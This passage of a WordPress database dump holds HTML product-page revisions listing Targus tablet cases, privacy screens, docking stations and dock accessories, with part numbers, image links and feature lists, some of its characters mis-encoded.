alt=\"VersaVuÂ® Classic Case for iPad Pro (11-inch) - Burgundy\" width=\"190\" height=\"190\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\" alt=\"Pro-Tekâ„¢ Rotating Case for iPad Pro (11-inch) - Black\" width=\"192\" height=\"192\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"192\" height=\"194\" /></p><ul><li>Available Color Black &amp; Gold</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision cut access to controls, ports and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black &amp; Blue</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Geometric Pro-Tek design delivers practical protection with adaptable good looks</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Patented 360Â° rotation for portrait/landscape viewing</li><li>Precision cut access to controls, ports and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal &amp; Blue</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu </strong><strong>11-inch</strong><strong> iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74413GL)</p><h3 style=\"text-align: center;\"><strong>Pro-Tekâ„¢ </strong><strong>Rotating Case </strong><strong>12.9-inch iPadÂ® Pro</strong></h3><p style=\"text-align: center;\">(THZ748GL)</p><h3 style=\"text-align: center;\"><strong>VersaVuÂ® Classic Case for </strong><strong>12.9-inch </strong><strong>iPadÂ® Pro</strong></h3><p style=\"text-align: center;\">(THZ749GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad Pro (11-inch) - Burgundy\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\" alt=\"Pro-Tekâ„¢ Rotating Case for iPad Pro (11-inch) - Black\" width=\"192\" height=\"192\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"196\" height=\"196\" /></p><ul><li>Available Color Black, Red &amp; Burgundy</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing</li><li>Geometric Pro-Tekâ„¢ design delivers practical protection and enhances stability</li><li>Patented custom-molded tray with reinforced corners guard against impact</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing</li><li>Precision control, port, and camera cutouts deliver hassle-free listening and photos</li><li>Boosts sound with audio scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing* for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu Signature </strong><strong>12.9-inchÂ </strong><strong> iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ750GL)</p><h3 style=\"text-align: center;\"><strong>SafePort Rugged </strong><strong>Case for </strong><strong>12.9-inch iPad </strong><strong>(6th gen. / 5th gen.)</strong></h3><p style=\"text-align: center;\">(THD138GLZ)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050377_versavu-signature-series-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Signature Series Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"190\" height=\"190\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/3_THD138GLZ_BACK2_1024x1024.jpg?v=1571711592\" width=\"189\" height=\"189\" /></p><ul><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing* for robust protection</li><li>Premium fabric/faux leather exterior with metallic accents delivers standout style</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul><li>Available Color Black</li><li>Heavy duty, shock-absorbing case for the iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch)</li><li>Form-fit TPU shell with USA Military-Spec drop protection â€“ protects your device from 1.2m/4ft drops</li><li>Offers rugged protection in a slim, professional-looking case</li><li>Sound enhancing scoops for all iPad speakers</li><li>Integrated stand for stable viewing and comfortable typing</li><li>Optional detachable shoulder strap (THA101GLZ)</li><li>Compatible with the ambient light sensor and mic on your device</li><li>Clear window on back to display asset tag</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Protect Case for Microsoft Surfaceâ„¢ Go</strong></h3><p style=\"text-align: center;\">(THZ779GL)</p><h3 style=\"text-align: center;\"><strong>Protect Case for Microsoft Surfaceâ„¢ Go</strong></h3><p style=\"text-align: center;\">(THD491GLZ)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ779GL_11_PEN2_1024x1024.jpg?v=1571711592\" width=\"193\" height=\"193\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THD491GL_20_USE4_1024x1024.jpg?v=1571711592\" width=\"192\" height=\"192\" /></p><ul><li>Available Color Black</li><li>Case passes military grade 4â€™ drop testing (MIL-STD 810G)*</li><li>Hard-moulded tray with durable kickstand</li><li>Advanced corner protection with shock-absorbent TPU</li><li>Non-slip interior for infinite viewing angles</li><li>Integrated Surface Pen holder (pen not included)</li><li>Compatible with Surface Type Cover</li><li>Compatible with Surface Dock</li><li>Full access to camera and ports</li></ul><ul><li>Available Color Black</li><li>Case passes military grade 4â€™ drop testing (MIL-STD 810G)*</li><li>Hard-moulded tray with durable kickstand</li><li>Advanced corner protection with shock-absorbent TPU</li><li>Keyboard locking feature helps prevent accidental disconnects (keyboard not included)</li><li>Detachable hand strap (included) and integrated Surface Pen holder (pen not included)</li><li>Compatible with Surface Type Cover</li><li>Compatible with Surface Dock</li><li>Full access to camera and ports</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Privacy Screen</h1>		\n		<h3 style=\"text-align: center;\"><strong>Apple Macbook</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0049031_magnetic-privacy-screen-for-133-macbook-2017_ebc5f6e1-9646-4840-9ef4-6441c94ae069_grande.jpg?v=1571711592\" alt=\"Magnetic Privacy Screen for 13.3\" width=\"274\" height=\"274\" /></p><h2 style=\"text-align: center;\"><strong>Magnetic Privacy Screen for Apple MacBook</strong></h2><ul id=\"product-features\"><li>Protect your on-screen data, Privacy Screens block angled viewing from prying eyes</li><li>Magnetic screens easy to attach, remove and reattach. No tools, no adhesives, no installation required</li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort</li><li>AvailableÂ  for :-</li></ul><ol><li style=\"list-style-type: none;\"><ol><li><h4>MacBook 12-inch (ASM12MBGL)</h4></li><li><h4>MacBook 13.3-inch (ASM133MBP6GL)</h4></li><li><h4>MacBook Air 13.3-inch (ASM133MBA7GL)</h4></li><li><h4>MacBook 15.4-inch (ASM154MBGL)</h4></li><li><h4>MacBook Pro 15.4-inch (ASM154MBP6GL)</h4></li></ol></li></ol><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Microsoft Surface</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0023768_privacy-screen-microsoft-surface-pro-4-123-clear_grande.jpg?v=1571711583\" alt=\"Privacy Screen Microsoft Surface Pro 4 (12.3\" width=\"215\" height=\"215\" /></p><h2 style=\"text-align: center;\">Â Microsoft Surface Pro 4 (12.3\") - Clear</h2><ul id=\"product-features\"><li>Privacy Screen for theÂ Microsoft Surface Pro 4 (12.3\") tablet</li><li>Works with touch screen</li><li>Anti-glare</li><li>Protect the information on your screen from unwanted viewing</li><li>Targus privacy screens are more touch-sensitive than other screens on the market</li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<strong><a href=\"https://uk.targus.com/pages/keep-your-business-your-business\" target=\"_blank\" rel=\"noopener noreferrer\"><u><br /></u></a></strong></li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Laptop</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0019195_privacy-screen-116w-169_grande.jpg?v=1571711590\" alt=\"Targus Privacy Screen 11.6\" width=\"307\" height=\"307\" /></p><h2 style=\"text-align: center;\">Privacy Screen</h2><ul id=\"product-features\"><li>Privacy Screen for tablet, laptop or desktop screens</li><li>Works with touch screens and dual screens</li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort</li><li>Anti-glare</li><li>Protect the information on your screen from unwanted viewing</li><li>Targus privacy screens are more touch-sensitive than other screens on the market</li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room</li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips</li><li>Available for :-Â </li></ul><ol><li style=\"list-style-type: none;\"><ol><li><h4>Screen 11.6\"W - 16:9 (ASF116W9EU)</h4></li><li><h4>Screen 12.1\"W - 16:10 (ASF121WEU)</h4></li><li><h4>Screen 12.5\"W - 16:9 (ASF125W9EU)</h4></li><li><h4>Screen 13.3\"W - 16:10 (ASF133WEU)</h4></li><li><h4>Screen 13.3\"W 16:9 - (ASF133W9EU)</h4></li><li><h4>Screen 14.1\"W 16:10 - (ASF141WEU)</h4></li><li><h4>Screen 14.1\"W 16:9 - (ASF141W9EU)</h4></li><li><h4>Screen 14â€ W 16:9 - (ASF14W9EU)</h4></li><li><h4>Screen 15.4\"W 16:10 - (ASF154WEU)</h4></li><li><h4>Screen 15.6\"W 16:9 - (ASF156W9EU)</h4></li></ol></li></ol><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Monitor</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0019283_privacy-screen-17-43_grande.jpg?v=1571711590\" alt=\"Targus Privacy Screen 17\" width=\"269\" height=\"269\" /></p><h2 style=\"text-align: center;\">Privacy Screen</h2><ul id=\"product-features\"><li>Privacy Screen for laptop or desktop screens</li><li>Works with touch screens and dual screens</li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort</li><li>Anti-glare</li><li>Protect the information on your screen from unwanted viewing</li><li>Targus privacy screens are more touch-sensitive than other screens on the market</li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room</li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips</li><li>Available for :-Â </li></ul><ol><li style=\"list-style-type: none;\"><ol><li><h4>Screen 17\" 4:3 - (ASF170EU)</h4></li><li><h4>Screen 19\" 4:3 - (ASF190EU)</h4></li><li><h4>Screen 19\"W 16:10 - (ASF19WEU)</h4></li><li><h4>Screen 21.5\"W 16:9 - (ASF215W9EU)</h4></li><li><h4>Screen 22\"W 16:10 - (ASF220WEU)</h4></li><li><h4>Screen 22\"W 16:9 - (ASF22W9EU)</h4></li><li><h4>Screen 23\"W 16:9 - (ASF23W9EU)</h4></li><li><h4>Screen 23.8\"W 16:9 - (ASF238W9EU)</h4></li><li><h4>Screen 24\"W 16:10 - (ASF24WEU)</h4></li><li><h4>Screen 24\"W 16:9 - (ASF24W9EU)</h4></li><li><h4>Screen 27\"W 16:9 - (ASF27W9EU)</h4></li></ol></li></ol><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>','Targus','','inherit','closed','closed','','3686-revision-v1','','','2019-11-06 14:02:47','2019-11-06 06:02:47','',3686,'https://bintara.com.my/blog/2019/11/06/3686-revision-v1/',0,'revision','',0),(3702,1,'2019-11-06 14:09:42','2019-11-06 06:09:42','<p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\" alt=\"safeport rugged ipad case\" /></p><h2>Safeguard Your Valuables</h2><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and otherÂ tablet casesÂ - includingÂ Field-ReadyÂ andÂ RuggedÂ options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.</p>		\n		<h2>Expand Your Potential</h2><p>At Targus, weâ€™re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard/mice, and laptop chargers.</p><p>4K docking stationsÂ are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. OurÂ dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all the cables, adapters, and storage trays you need in our collection of docking station accessories.</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\" alt=\"expand your potential dock quad docking station\" width=\"519\" height=\"348\" /></p>		\n			<h1>Docking Stations</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal QUAD HD (QVHD) Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK520USZ)</p><h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal DV4K Docking Station with 100W Power</strong></h3><p style=\"text-align: center;\">(DOCK190AP)</p><h3 style=\"text-align: center;\"><strong>Thunderboltâ„¢ 3 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK220AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\" width=\"222\" height=\"222\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\" alt=\"USB-Câ„¢ Universal DV4K Docking Station with 100W Power\" width=\"210\" height=\"210\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/Dock220_grande.jpg?v=1553684715\" alt=\"Thunderboltâ„¢ 3 DV4K Docking Station with Power\" width=\"214\" height=\"214\" /></p><ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C 3.0 Port with power (15W non-PD)</li></ul><ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPortâ„¢ (DP 1.2a) and 2 HDMI (HDMI 2.0) ports</li><li>Power Delivery up to 100W</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C USB 3.1 Gen 1 device port</li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot</li><li>Power tips included to power AcerÂ®, ASUSÂ®, CompaqÂ®, Dellâ„¢, FujitsuÂ®, GatewayÂ®, HPÂ®, IBM/Lenovoâ„¢, and Toshiba</li></ul><ul><li>0.5M passive 40G, 5A cable (C/M to C/M)</li><li>Cable lock slot</li><li>Power Delivery 2.0 up to 85W</li><li>Supports dual-display</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK171)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK177)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK160AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACP71USZ_grande.png?v=1551118350\" alt=\"Universal USB 3.0 DV Docking Station with Power\" width=\"197\" height=\"197\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\" alt=\"Universal USB 3.0 DV4K Docking Station with Power\" width=\"205\" height=\"205\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock160usz_grande.png?v=1554473002\" alt=\"Universal USB 3.0 DV4K Docking Station\" width=\"205\" height=\"205\" /></p><ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone power and charging tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB ÂµB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li></ul><ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB 3.0 uB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 chipset</li></ul><ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each</li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio</li><li>1 USB-C device port (USB 3.0 5Gbps data only)</li><li>1 Gigabit Ethernet port for wired connectivity</li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)</li><li>1 3.5mm combo Audio In/Out port for mics, speakers, and earphones</li><li>Includes 1-meter USB-ÂµB/M to A/M cable (detachable)</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment</li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms</li><li>Includes 45W AC adapter</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>USB-C Universal DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK180AP)</p><h3 style=\"text-align: center;\"><strong>USB-C Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK410AP)</p><h3 style=\"text-align: center;\"><strong>2K Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK120AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\" alt=\"USB-C Universal DV4K Docking Station with Power\" width=\"234\" height=\"234\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0041279_usb-c-universal-docking-station-black.jpeg\" width=\"236\" height=\"236\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\" alt=\"2K Universal Docking Station\" width=\"238\" height=\"238\" /></p><ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors</li><li>Power Delivery 2.0 provides up to 60W charging</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C device port (USB 3.0 data only)</li><li>1 Gigabit Ethernet port for secure, wire speed Ethernet access</li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)</li><li>Includes 1-meter USB-C to C host cable (detachable)</li><li>1 3.5mm combo Audio In/Out for mics, speakers, and earphones</li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates industry-standard security locks</li></ul><ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard security locks to safeguard equipment</li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems</li></ul><ul><li>1 Audio In/Out port for mics, speakers and earphones</li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)</li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds</li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals</li><li>1 USB 3.0 powered port for fast device charging</li><li>Integrated Lock Slot accommodates security locks to safeguard equipment</li><li>Universal compatibility with popular brands and operating systems</li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaLink Universal Dual Video Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK110AP)</p><h3 style=\"text-align: center;\"><strong>USB-C DisplayPortâ„¢ Alt-Mode Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK411)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(DOCK412AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock110usz_grande.jpg?v=1553684661\" alt=\"VersaLink Universal Dual Video Travel Dock\" width=\"259\" height=\"180\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\" width=\"181\" height=\"181\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\" alt=\"Picture of USB-C Alt-Mode Travel Dock w/ PD (Black)\" width=\"187\" height=\"187\" /></p><ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.</li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.</li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability</li><li>Mac or PC compatible</li></ul><ul><li>Host-powered 90 mm tethered USB Type-C DisplayPortâ„¢ Alt-Mode (compatible with Thunderboltâ„¢ 3) host connection</li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp monitor connection</li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port</li><li>1 Gigabit Ethernet port</li><li>HDMI includes 6 (5.1) channel audio</li><li>Universal compatibility with popular WindowsÂ® and macOSâ„¢ platforms</li><li>Compact size thatâ€™s ideal for travel</li></ul><ul><li>mDP (4096 x 2160 p30 max)</li><li>HDMI (4096 x 2160 p30 max)</li><li>VGA (1920 x 1200)</li><li>USB-C upstream cable (Laptop charging capable by PD pass through)</li><li>2 x USB 3.1 Gen 1 type A downstream port</li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support</li><li>Gigabit Ethernet; Lock Slot</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Dock Accessories</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-C to USB-A Cable</strong></h3><p style=\"text-align: center;\">(ACC1104GLX)</p><h3 style=\"text-align: center;\"><strong>3-Pin 3-Way Hydra DC Power Cable</strong></h3><p style=\"text-align: center;\">(ACC1009USX)</p><h3 style=\"text-align: center;\"><strong>USB-C Multiplexer Adapter</strong></h3><p style=\"text-align: center;\">(ACA46USZ)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(ACA42USZ)</p><p><img src=\"https://www.targus.com/content/images/thumbs/0053546_usb-cf-to-usb-30-am-cable.jpeg\" width=\"188\" height=\"188\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0030033_3-pin-3-way-hydra-dc-power-cable.png\" width=\"187\" height=\"187\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA47GLZ_MAIN1_grande.png?v=1564601685\" alt=\"USB-C Multiplexer Adapter\" width=\"189\" height=\"189\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA42USZ_grande.jpg?v=1553683594\" alt=\"USB-Câ„¢ Demultiplexer\" width=\"194\" height=\"194\" /></p><ul><li>USB Type-C female to USB 3.0 Type-A cable</li><li>10cm long with tether</li><li>Transfers data at rates up to 5 Gbps</li><li>Compatible with Targus DOCK180USZ</li></ul><ul><li>Powers up to 1 large and 1 small device simultaneously</li><li>Supports three connectors for multi-user and multi-device environments</li><li>Self-locking collars ensure tips and power cable stay in place</li><li>Uses existing Targus power cable and power tips from your powered dock (not included)</li></ul><ul><li>Supports USB-C laptops</li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ</li><li>Compact size for easy carrying</li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port</li><li>5 different charge profiles to ensure compatibility</li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C</li></ul><ul><li>1 USB-C/F port</li><li>Enables support for legacy host devices</li><li>Uses universal 3-pin power tip support</li><li>For use with DOCK 180</li><li>Supports power delivery charging up to 60W</li><li>Supports USB 3.0 data transfer up 5 Gbps</li><li>1 USB 3.0 Type A/M cable</li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Tablet Cases</h1>		\n		<h3 style=\"text-align: center;\"><strong>VersaVuÂ® Multi-Gen for 9.7\" IPad Pro, iPad Air 1, And 2</strong></h3><p style=\"text-align: center;\">(THZ634GL)</p><h3 style=\"text-align: center;\"><strong>3D Protection</strong><strong>â„¢ </strong><strong style=\"font-size: 